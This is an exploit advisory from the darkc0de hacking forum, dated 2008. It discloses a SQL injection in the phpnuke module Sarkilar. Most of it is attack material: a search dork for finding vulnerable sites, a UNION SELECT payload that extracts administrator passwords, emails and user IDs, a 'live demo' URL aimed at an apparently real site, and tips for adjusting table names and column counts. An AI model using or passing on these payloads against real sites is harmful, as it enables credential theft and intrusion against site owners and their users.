################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -Jappan - beenu # #-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz # # and all darkc0de and NikTrix members ---# ################################################################ # # Author: r45c4l (first noticed by echoll) # # Home : www.darkc0de.com & niktrix.info # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: phpnuke module Sarkilar SQL Injection vulnerabilit # # ################################################################ # # d0rk : inurl:?name=Sarkilar # ################################################################ POC :- http://www.site.com/[path]/modules.php?name=Sarkilar&op=showcontent&id=-7+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+nuke_authors-- Live Dem0:- http://www.hebuname.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- Table names can be modified in some sites from nuke_authors to site_authors and in some case number of columns may also be diffrent than the above POC, so u can try to change it manually if the above POC shows any error. ########################################################### # # Bug discovered : 17 oct 2008 # ###########################################################